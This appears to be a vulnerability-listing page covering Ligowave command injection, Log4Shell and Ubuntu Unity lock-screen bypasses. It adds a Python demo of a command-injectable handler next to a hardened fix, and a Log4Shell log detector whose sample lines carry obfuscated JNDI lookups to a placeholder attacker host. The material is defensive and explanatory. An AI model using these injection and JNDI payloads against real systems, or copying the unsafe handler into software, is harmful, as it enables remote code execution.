CVE-2024-4999 – Ligowave Unity/Pro/Mimo/APC Arbitrary Command Injection
https://notcve.org/view.php?id=CVE-2024-4999
A vulnerability in the web-based management interface of multiple Ligowave devices could allow an authenticated remote attacker to execute arbitrary commands with elevated privileges. This issue affects UNITY: through 6.95-2; PRO: through 6.95-1.Rt3883; MIMO: through 6.95-1.Rt2880; APC Propeller: through 2-5.95-4.Rt3352.
• https://onekey.com/blog/security-advisory-remote-code-execution-in-ligowave-devices
• CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
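The advisory does not publish the affected parameter or the device code, so the following is an added illustration of the CWE-77 pattern behind this class of bug, not Ligowave's firmware: a hypothetical "ping this host" handler that splices a request value into a shell string, beside a hardened version that allowlists the argument and passes an argv list with no shell. `echo` stands in for the real network tool so the demo runs offline; the attacker input is constructed.

```python
import ipaddress
import re
import subprocess

# Hypothetical handler shape (assumption: a diagnostics page that pings a
# user-supplied host). 'echo' replaces the real tool so this runs offline.

HOSTNAME_RE = re.compile(
    r"(?=.{1,253}$)"                                   # total length cap
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"   # first label, no leading '-'
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)


def run_unsafe(host: str) -> str:
    """Vulnerable: the request value is spliced into a string that /bin/sh parses.

    Any shell metacharacter in `host` (';', '|', '&&', '$(...)', backticks) is
    interpreted, so a second command runs with the web process's privileges.
    """
    cmd = "echo ping -c 1 " + host
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate_host(host: str) -> str:
    """Allowlist the argument: an IP literal or a plain DNS name, nothing else."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if HOSTNAME_RE.fullmatch(host):
        return host
    raise ValueError(f"rejected host argument: {host!r}")


def run_safe(host: str) -> str:
    """Hardened: validated value, argv list, no shell.

    With a list there is no command-line re-parsing, and the leading-character
    rule in HOSTNAME_RE also blocks option injection such as '-c 1000000'.
    """
    argv = ["echo", "ping", "-c", "1", validate_host(host)]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def is_rejected(host: str) -> bool:
    """True when the hardened path refuses the value outright."""
    try:
        validate_host(host)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "127.0.0.1; echo INJECTED"   # constructed attacker input
    print("unsafe ->", repr(run_unsafe(payload)))
    print("safe   ->", "rejected" if is_rejected(payload) else run_safe(payload))
```

The point of the hardened path is that both controls are needed: the argv list removes the shell, and the allowlist removes option injection and anything the downstream tool might itself interpret. Escaping metacharacters while keeping `shell=True` is the fix that tends to be bypassed.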
CVE-2021-44228 – Apache Log4j2 Remote Code Execution Vulnerability
https://notcve.org/view.php?id=CVE-2021-44228
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
• https://github.com/fullhunt/log4j-scan https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words https://github.com/cyberstruggle/L4sh https://github.com/woodpecker-appstore/log4j-payload-generator https://github.com/tangxiaofeng7/apache-log4j-poc https://www.exploit-db.com/exploits/51183 https://www.exploit-db.com/exploits/50592 https://www.exploit-db.com/exploits/50590 https://github.com/logpresso/CVE-2021-44228-Scanner https://github.com/jas502n/Log4j2-CVE-2021-44228 h
• CWE-20: Improper Input Validation CWE-400: Uncontrolled Resource Consumption CWE-502: Deserialization of Untrusted Data CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
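The description above says the trigger is an attacker-controlled log message containing a JNDI lookup; in practice the lookups that reached servers were rarely the plain `${jndi:ldap://...}` form, because Log4j's nested-lookup syntax (`${lower:j}`, `${upper:n}`, `${::-j}`, `${env:NOPE:-j}`) lets the string be assembled at evaluation time. The detector below is an added example, not code from the advisory or from any of the scanners listed above: it URL-decodes each line, collapses those obfuscations the way Log4j would evaluate them, and reports the scheme and host of any resulting JNDI lookup. The access-log lines and the `attacker.example` host are constructed for the demo.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not from any real incident); attacker.example is a placeholder.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:12:01 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:12:07 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:12:09 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://attacker.example/b} HTTP/1.1" 404',
    '10.0.0.9 - - [10/Dec/2021:10:12:11 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
    '10.0.0.9 - - [10/Dec/2021:10:12:13 +0000] "GET / HTTP/1.1" 200 "-" "${${env:NaN:-j}ndi:dns://attacker.example/d}"',
    '10.0.0.9 - - [10/Dec/2021:10:12:15 +0000] "GET /?q=%24%7Bjndi%3Aldaps%3A%2F%2Fattacker.example%2Fe%7D HTTP/1.1" 200',
    '10.0.0.3 - - [10/Dec/2021:10:12:17 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200',
]

# An innermost ${...}: a lookup whose body contains no further '${' or '}'.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A resolved JNDI lookup: ${jndi:<scheme>://<host>...}
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([A-Za-z][A-Za-z0-9+.-]*)://([^/:}\s]+)", re.IGNORECASE)


def _resolve_one(m):
    """Evaluate one innermost lookup the way Log4j's Interpolator would."""
    body = m.group(1)
    if ":-" in body:
        # ${::-j} and ${env:NaN:-j}: an empty or unresolvable lookup yields its default
        return body.split(":-", 1)[1]
    name, _, key = body.partition(":")
    if name.lower() == "lower":
        return key.lower()
    if name.lower() == "upper":
        return key.upper()
    return m.group(0)  # jndi:, date:, ... stay in place for the detector to see


def normalize(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups inside-out until the string stops changing."""
    for _ in range(max_rounds):
        new = INNERMOST.sub(_resolve_one, text)
        if new == text:
            break
        text = new
    return text


def scan(lines):
    """One finding per line that contains a JNDI lookup after decoding and de-obfuscation."""
    findings = []
    for n, raw in enumerate(lines, 1):
        decoded = normalize(unquote(raw))  # access logs usually carry the payload URL-encoded
        m = JNDI.search(decoded)
        if m:
            findings.append({"line": n, "scheme": m.group(1).lower(),
                             "host": m.group(2), "lookup": m.group(0)})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"line {f['line']}: {f['scheme']} lookup to {f['host']}  ({f['lookup']})")
```

Normalizing before matching is what separates this from a grep for `jndi`: the third, fourth and fifth sample lines contain no such substring yet all resolve to a JNDI lookup, while the benign `${date:yyyy}` lookup on the last line is left alone and not reported. The scheme and host fields are what you want to pivot on next (egress to the host, LDAP/RMI connections from the JVM), since the log line only proves an attempt, not that lookup substitution was enabled on the target.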
CVE-2014-5195
https://notcve.org/view.php?id=CVE-2014-5195
Unity before 7.2.3 and 7.3.x before 7.3.1, as used in Ubuntu, does not properly take focus of the keyboard when switching to the lock screen, which allows physically proximate attackers to bypass the lock screen by (1) leveraging a machine that had text selected when locking or (2) resuming from suspend.
• http://www.osvdb.org/109788 http://www.securityfocus.com/bid/68987 http://www.ubuntu.com/usn/USN-2303-1 https://bugs.launchpad.net/unity/7.2/+bug/1349128 https://exchange.xforce.ibmcloud.com/vulnerabilities/95199
• CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
CVE-2014-3204
https://notcve.org/view.php?id=CVE-2014-3204
Unity before 7.2.1, as used in Ubuntu 14.04, does not properly handle keyboard shortcuts, which allows physically proximate attackers to bypass the lock screen and execute arbitrary commands, as demonstrated by right-clicking on the indicator bar and then pressing the ALT and F2 keys.
• http://ubuntu.com/usn/usn-2184-1 http://www.openwall.com/lists/oss-security/2014/04/29/2 http://www.openwall.com/lists/oss-security/2014/05/03/1 http://www.securityfocus.com/bid/67117 https://bugs.launchpad.net/ubuntu/+source/unity/+bug/1313885
• CWE-264: Permissions, Privileges, and Access Controls
CVE-2014-3202
https://notcve.org/view.php?id=CVE-2014-3202
Unity before 7.2.1 does not properly handle entry activation, which allows physically proximate attackers to bypass the lock screen by holding the ENTER key, which triggers the process to crash.
• http://www.openwall.com/lists/oss-security/2014/04/26/1 http://www.openwall.com/lists/oss-security/2014/04/26/2 http://www.openwall.com/lists/oss-security/2014/04/29/2 http://www.openwall.com/lists/oss-security/2014/05/03/1 https://bugs.launchpad.net/ubuntu/+source/unity/+bug/1308572 https://bugs.launchpad.net/unity/+bug/1308750
• CWE-264: Permissions, Privileges, and Access Controls